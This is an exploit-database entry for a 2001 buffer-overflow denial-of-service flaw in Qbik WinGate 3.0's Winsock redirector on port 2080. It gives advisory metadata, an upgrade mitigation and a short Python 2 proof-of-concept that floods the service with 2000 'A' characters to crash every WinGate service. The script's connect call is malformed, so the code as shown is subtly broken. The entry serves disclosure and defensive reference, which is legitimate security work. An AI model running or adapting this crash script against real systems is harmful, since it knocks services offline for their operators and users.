WinGate's Winsock Redirector Service Buffer Overflow Vulnerability

vendor:

Wingate

by:

eEye Digital Security Team

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Wingate

Affected Version From: 3

Affected Version To: 3

Patch Exists: YES

Related CWE: N/A

CPE: a:qbik_software:wingate

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2001

WinGate’s Winsock Redirector Service Buffer Overflow Vulnerability

By connecting to port 2080 on a system running Qbik Wingate 3.0 and sending 2000 characters, all wingate services will crash.

Mitigation:

Upgrade to version 4.0.1

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/509/info

WinGate's Winsock redirector service is susceptible to a buffer overflow vilnerability that will crash all WinGate services.

#!/usr/bin/python
#
# Qbik Wingate 3.0 DoS Proof of Concept Code.
# Vulnerability Discovered by eEye Digital Security
Team(http://www.eEye.com)
# Simple Script by Prizm(Prizm@Resentment.org)
# 
# By connecting to port 2080 on a system running Qbik Wingate 3.0 and
# sending 2000
# characters, all wingate services will crash.
# *Solution* Upgrade to 4.0.1, version is not vulnerable to this Denial of
# Service attack. 
#
# This *simple* little script will crash all wingate services.


import socket
import sys
from string import strip

host="xxx.xxx.xxx.xxx" # Replace x's with IP.
port=2080
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

try:
  s.connect(host,port)
  print "connection succeeded."
except socket.error, e:
  print "connection failed, " + e.args

s.send("A" * 2000)

#end